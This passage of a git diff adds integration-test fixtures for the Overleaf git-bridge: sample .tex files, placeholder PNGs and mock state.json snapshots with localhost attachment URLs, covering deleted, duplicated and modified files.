"createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3881/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/main.tex 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/state.json new file mode 100644 index 0000000..d2b26f0 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3863/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json new file mode 100644 index 0000000..83079f5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json @@ -0,0 +1,68 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3863/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/state.json new file mode 100644 index 0000000..8089258 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3860/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/state.json new file mode 100644 index 0000000..6685ef8 --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/state.json @@ -0,0 +1,68 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted test.tex", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\nadded more stuff\n", + "path": "main.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3860/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3860/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. 
\ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/state.json new file mode 100644 index 0000000..4ac8c79 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4001/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410-copy.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410-copy.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/test.tex 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json new file mode 100644 index 0000000..ff0c3ee --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json @@ -0,0 +1,76 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4001/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + }, + { + "url": "http://127.0.0.1:4001/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4001/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/state.json new file mode 100644 index 0000000..77fab7a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3862/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..7fa339b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png differ diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json new file mode 100644 index 0000000..ff9cdb7 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json @@ -0,0 +1,72 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i changed the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\nadded more stuff\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3862/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3862/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/state.json new file mode 100644 index 0000000..ea21d9a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": 